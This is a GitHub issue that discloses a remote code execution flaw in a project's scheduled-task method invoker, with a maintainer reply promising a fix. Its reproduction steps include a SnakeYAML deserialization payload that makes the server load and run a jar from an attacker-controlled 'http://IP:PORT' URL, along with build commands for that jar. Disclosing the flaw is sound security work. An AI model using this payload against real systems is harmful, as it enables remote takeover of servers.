New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[vulnerability] Remote Code Execute #168
Comments
Thank you for your feedback, I will fix it as soon as possible, and also welcome pr |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1. Steps to reproduce
Using the project
https://github.com/artsploit/yaml-payload
, modifyAwesomeScriptEngineFactory.java
as followsBuilding and package, move
yaml-payload.jar
into the root directory of the web servicejavac src/artsploit/AwesomeScriptEngineFactory.java jar -cvf yaml-payload.jar -C src/ .
A new scheduled task is created as follows
调用方法
field isorg.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')
Execute this task after submission to remotely execute arbitrarily code
2. Expected behavior
The
com.aurora.util.JobInvokeUtil#invokeMethod
method is used to reflectively execute the specified method of the given class3. Actual behavior
However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed
4. Affected Version
latest
5. Fixes Recommendations
The text was updated successfully, but these errors were encountered: